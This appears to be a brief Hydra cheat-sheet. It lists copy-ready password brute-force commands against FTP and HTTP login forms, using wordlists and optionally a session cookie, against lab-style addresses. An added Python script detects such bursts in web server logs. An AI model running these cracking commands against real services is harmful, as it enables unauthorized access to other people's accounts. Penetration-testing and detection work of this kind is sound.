Hydra

thc.org

Introduction

Hydra is a parallelized login cracker that supports numerous protocols. It is very fast and flexible, and new modules are easy to add. The tool lets researchers and security consultants show how easy it would be to gain unauthorized remote access to a system.

Installation

$ sudo apt-get install -y hydra

Usage

Ftp

$ hydra -t 10 -V -f -l root -P wordlists/rockyou.txt ftp://127.0.0.1

Http form

$ hydra -l admin -P /path/to/passwordlist 10.10.10.10 http-post-form "/index.php:user=^USER^&pass=^PASS^:Wrong Password!"

Http form without user

$ hydra -l '' -P /path/to/passwordlist 10.10.10.10 -s 3365 http-post-form "/:password=^PASS^:Invalid Password!"

-t = Number of parallel attempts at a time (1/5/10/100?). Don't set it too high, otherwise you will get false results.
-V = Show output (verbose)
-f = Stop when the password is found
-l = The username (-L to read usernames from a file)
-P = Dictionary (password list) file

To run the same attack with a cookie, use the following:

$ hydra -l '' -P /path/to/passwordlist 10.10.10.10 -s 3365 http-post-form "/:password=^PASS^:Invalid Password!:H=Cookie:PHPSESSID=dnpbasdjtas6dui"
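
Detecting this on the server side (an added example, not part of the original page or of Hydra): the form commands above decide failure from a string in the response body ("Wrong Password!"), so failed logins usually appear in the access log as ordinary 200 responses, and the reliable signal is the rate of POSTs to the login path per source address. The log lines, the threshold and the window below are constructed assumptions; the login path /index.php is the one used in the example above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in Common Log Format (not from a real server).
SAMPLE_LOG = """\
10.10.10.20 - - [12/Mar/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 1024
10.10.10.20 - - [12/Mar/2024:10:00:05 +0000] "POST /index.php HTTP/1.1" 200 980
10.10.10.99 - - [12/Mar/2024:10:00:10 +0000] "POST /index.php HTTP/1.1" 200 980
10.10.10.99 - - [12/Mar/2024:10:00:10 +0000] "POST /index.php HTTP/1.1" 200 980
10.10.10.99 - - [12/Mar/2024:10:00:11 +0000] "POST /index.php HTTP/1.1" 200 980
10.10.10.99 - - [12/Mar/2024:10:00:11 +0000] "POST /index.php HTTP/1.1" 200 980
10.10.10.99 - - [12/Mar/2024:10:00:12 +0000] "POST /index.php HTTP/1.1" 200 980
10.10.10.20 - - [12/Mar/2024:10:00:45 +0000] "POST /index.php HTTP/1.1" 302 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

def find_login_bursts(log_text, login_path="/index.php", threshold=5, window_s=10):
    """Map each source IP to the time its login POSTs first reached
    `threshold` within a sliding window of `window_s` seconds."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Status code is deliberately ignored: form failures often return 200.
        if m["path"].split("?")[0] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:   # drop attempts that left the window
            q.popleft()
        if len(q) >= threshold and m["ip"] not in flagged:
            flagged[m["ip"]] = ts
    return flagged

if __name__ == "__main__":
    for ip, when in find_login_bursts(SAMPLE_LOG).items():
        print(f"possible brute force from {ip} at {when.isoformat()}")
```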

To see the full help listing:

# hydra --help

Useful Links

sectools.org/tool/hydra
tools.kali.org